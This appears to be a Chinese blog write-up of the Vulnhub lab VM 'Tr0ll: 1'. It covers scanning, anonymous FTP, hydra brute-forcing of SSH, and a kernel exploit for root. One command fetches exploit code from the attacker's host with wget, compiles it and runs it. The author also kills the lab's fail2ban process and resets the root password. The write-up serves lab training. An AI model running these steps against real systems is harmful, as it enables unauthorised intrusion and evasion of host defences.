【Vulnhub通关】Tr0ll: 1

封面.jpg


准备工作

靶机基本信息

靶机名称:Tr0ll: 1
操作系统:Linux
网络连接方式:NAT
虚拟机软件:VMware Workstation
渗透测试目标:获取靶机root权限并读取Flag文件
下载地址:Tr0ll: 1 ~ VulnHub

靶机界面截图.png

环境配置

点击本文中的靶机下载链接,下载完成之后将其解压至指定位置,随后打开VMware Workstation,点击主页上的文件 => 扫描虚拟机,在弹出的窗口中选中保存路径即可导入靶机。


信息收集

IP地址发现

在Kali Linux中,我们可以使用netdiscover工具发送ARP请求来发现靶机的IP地址。

netdiscover -r 192.168.20.0/24

ip地址发现.png
可以发现靶机的IP地址为192.168.20.130

防火墙探测

接下来我们使用Nmap对靶机进行防火墙探测:

nmap -sA -p- 192.168.20.130

防火墙探测.png
无法确定防火墙状态,直接进行网络端口扫描。

网络端口扫描

我们可以使用Nmap工具扫描靶机的开放端口、软件版本和操作系统版本:

# TCP扫描
nmap -sS -sV -A -p- -oN ./tcp_result.txt 192.168.20.130
# UDP扫描
nmap -sC -sU -sV -T4 -oN ./udp_result.txt 192.168.20.130

TCP扫描结果
tcp扫描结果.png
UDP扫描结果
udp扫描结果.png
可以看到靶机开放了如下端口:

端口传输层协议应用层协议详细信息
21TCPFTPvsftpd 3.0.2
22TCPSSHOpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80TCPHTTPApache httpd 2.4.7 ((Ubuntu))

同时发现靶机操作系统为Ubuntu Linux,内核版本大概为Linux 3.2 - 4.9


服务探测

FTP服务(21端口)

我们首先使用Nmap对靶机的21号端口进行扫描:

nmap --script=*ftp* -p 21 192.168.20.130

ftp扫描结果.png
可以看到靶机的FTP服务允许匿名登录。直接尝试查看:
ftp目录.png
发现里面只有一个.pcap格式的网络抓包文件。使用Wireshark查看:
pcap流量包.png
在流量包的第40号传输中发现了文件secret_stuff.txt的内容,里面有一个不明意义的词sup3rs3cr3tdirlol,貌似是告诉我们几乎已经找到了秘密文件夹的位置。
尝试向FTP上传文件,但是我们并无权限。

SSH服务(22端口)

我们使用Netcat确定端口Banner:

┌──(root㉿attacker)-[/home/hacker]
└─# nc -nv 192.168.20.130 22                
(UNKNOWN) [192.168.20.130] 22 (ssh) open
SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2
^C

Web应用程序(80端口)

我们使用浏览器打开网址:http://192.168.20.130/
主页.png
尝试进行目录扫描:

dirsearch -u http://192.168.20.130/ -x 400,403,404

目录扫描.png
发现了/secretrobots.txt,除此之外,还发现了/sup3rs3cr3tdirlol目录。
访问robots.txt,发现内容如下:

User-agent:*
Disallow: /secret

查看/secret目录:
secret目录.png
查看/sup3rs3cr3tdirlol目录,发现如下文件:
关键目录.png


渗透测试

sup3rs3cr3tdirlol目录中的文件下载之后,发现为ELF文件。直接进行逆向分析:
逆向roflmao.png

发现该程序只是打印了字符串Find address 0x0856BF to proceed到终端上,但这里的所谓“地址”应该指的不是内存地址。。。。

尝试访问目录http://192.168.20.130/0x0856BF
0x0856BF目录.png
/good_luck目录下包含一个文本文档。内容如下:

maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow

/this_folder_contains_the_password目录下包含一个文本文档,内容如下:

Good_job_:)

尝试爆破SSH服务账号密码,但是失败了。
提示说这个文件夹包含密码 ,于是自己制作了如下字典:

Good_job_:)
0x0856BF
this
folder
contains
password
the
this_folder_contains_the_password
Pass
pass
Pass.txt
pass.txt
txt
good
luck
good_luck
which
one
lol
which_one_lol
which_one_lol.txt

再次尝试爆破,成功:

hydra -L ./userlist -P ./pass 192.168.20.130 ssh

ssh密码爆破.png
找到SSH登录凭据:

  • 用户名:overflow
  • 密码:Pass.txt

直接使用Termius登录:
登录ssh.png


权限提升

本地信息收集

进入靶机系统之后,我们通过SimpleHTTPServer上传LinPeas工具进行本地信息收集:

系统基本信息
系统基本信息.png
用户列表
用户列表.png
进程列表
进程信息.png
特殊权限文件
特权文件.png
计划任务
计划任务.png
经分析研判后,总结出如下信息:

  1. 靶机操作系统版本较低,为Ubuntu Linux 14.04.1 LTS,内核版本为3.13.0,可能存在内核漏洞。
  2. 靶机以root用户权限运行了fail2ban-server程序,经查,该程序为防病毒与主机安全防御软件,不存在通过该程序提权可能(进程ID为1340)。

内核漏洞提权

我们在获取操作系统版本之后,尝试查询漏洞库:

searchsploit Ubuntu 14.04

成功查询到了多个安全漏洞:
查询漏洞.png
经过一番筛选后,选用了和靶机系统版本最贴合的37292号漏洞。但是该靶机上的反入侵软件比较强大,基本上传了木马文件就直接秒删,所以我们采取将多条命令合并成一条命令的措施(占用文件),并且在获取到root权限之后就立刻终止1340号进程

wget http://192.168.20.50:9000/37292.c && gcc 37292.c -o 37292 && chmod 777 ./37292 && ./37292

屏幕截图 2024-02-28 084537.png
直接更改密码:

# python -c "import pty;pty.spawn('/bin/bash')"
root@troll:/tmp# passwd root
Enter new UNIX password: *********
Retype new UNIX password: *********
passwd: password updated successfully

成功!!


Flag文件信息

文件名:proof.txt
文件大小:58.00 Bytes
文件路径:/root/proof.txt
MD5:ac7d51fca202ba7d1a15710966d1c2f0
SHA256:982501baf03dc0ed693222bab038ec3e7a4dbcfe2b2f176cf34a2e26d14571cf

文件内容展示:
flag截图.png


本次靶机渗透到此结束

  • 34
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

御坂19008号

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值